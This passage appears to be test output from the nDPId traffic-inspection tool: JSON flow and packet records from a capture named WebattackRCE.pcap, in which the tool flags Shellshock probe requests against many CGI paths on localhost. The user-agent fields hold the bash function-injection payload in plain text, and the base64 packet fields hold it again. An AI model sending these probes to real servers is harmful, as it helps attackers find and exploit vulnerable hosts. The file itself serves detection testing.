Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgitest.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277395,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":1,"flow_last_seen":1576420277395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277395,"pkt":"AAAAAAAAAAAAAAAACABFAAEMSAFAAEAG8+h\/AAABfwAAAcUaH5B7UH87Bk0XQYAYAED\/AAAAAQEICp1m\/budZv27R0VUIC9jZ2lfd3JhcHBlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} 
+01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277395,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi_wrapper","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277398,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":1,"flow_last_seen":1576420277398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277398,"pkt":"AAAAAAAAAAAAAAAACABFAAEMKndAAEAGEXN\/AAABfwAAAcUcH5BMbxKxdmdFb4AYAED\/AAAAAQEICp1m\/b6dZv2+R0VUIC9jb250YWN0LmNnaSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277398,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/contact.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277399,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":1,"flow_last_seen":1576420277399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277399,"pkt":"AAAAAAAAAAAAAAAACABFAAEK9YVAAEAGRmZ\/AAABfwAAAcUeH5Br181GQEYmBIAYAED+\/gAAAQEICp1m\/b+dZv2\/R0VUIC9jb3VudC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277399,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/count.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7560000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277401,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":1,"flow_last_seen":1576420277401,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277401,"pkt":"AAAAAAAAAAAAAAAACABFAAETxAhAAEAGd9p\/AAABfwAAAcUgH5CMzvzBXE4TboAYAED\/BwAAAQEICp1m\/cGdZv3BR0VUIC9kZWZhdWx0d2VicGFnZS5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7560000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277401,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/defaultwebpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277402,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00772{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":1,"flow_last_seen":1576420277402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277402,"pkt":"AAAAAAAAAAAAAAAACABFAAENn\/9AAEAGm+l\/AAABfwAAAcUiH5Cfgqc8sQq4SIAYAED\/AQAAAQEICp1m\/cKdZv3CR0VUIC9kb3dubG9hZC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277402,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/download.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7560000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277403,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":1,"flow_last_seen":1576420277403,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":288,"pkt_l4_len":254,"thread_ts_msec":1576420277403,"pkt":"AAAAAAAAAAAAAAAACABFAAESp5VAAEAGlE5\/AAABfwAAAcUkH5At0J9VXKwRhYAYAED\/BgAAAQEICp1m\/cOdZv3DR0VUIC9lbnRyb3B5c2VhcmNoLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} +01173{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7560000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277403,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/entropysearch.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277405,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":1,"flow_last_seen":1576420277405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277405,"pkt":"AAAAAAAAAAAAAAAACABFAAEI2lVAAEAGYZh\/AAABfwAAAcUmH5ARUOKViVHVaYAYAED+\/AAAAQEICp1m\/cSdZv3ER0VUIC9lbnYuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277405,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/env.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7560000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420277406,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":1,"flow_last_seen":1576420277406,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":286,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":286,"pkt_l4_len":252,"thread_ts_msec":1576420277406,"pkt":"AAAAAAAAAAAAAAAACABFAAEQ2p9AAEAGYUZ\/AAABfwAAAcUoH5D43eJbIwWC0IAYAED\/BAAAAQEICp1m\/cadZv3GR0VUIC9lbnZpcm9ubWVudC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} +01171{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7560000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420277406,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/environment.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277407,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":1,"flow_last_seen":1576420277407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277407,"pkt":"AAAAAAAAAAAAAAAACABFAAENbStAAEAGzr1\/AAABfwAAAcUqH5C5flXvg270eYAYAED\/AQAAAQEICp1m\/cedZv3HR0VUIC9lem1sbS1icm93c2UgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} +01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277407,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ezmlm-browse","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277409,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":1,"flow_last_seen":1576420277409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277409,"pkt":"AAAAAAAAAAAAAAAACABFAAENkcFAAEAGqid\/AAABfwAAAcUsH5BKNKl4Ee+JJYAYAED\/AQAAAQEICp1m\/cmdZv3JR0VUIC9mb3JtbWFpbC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} 
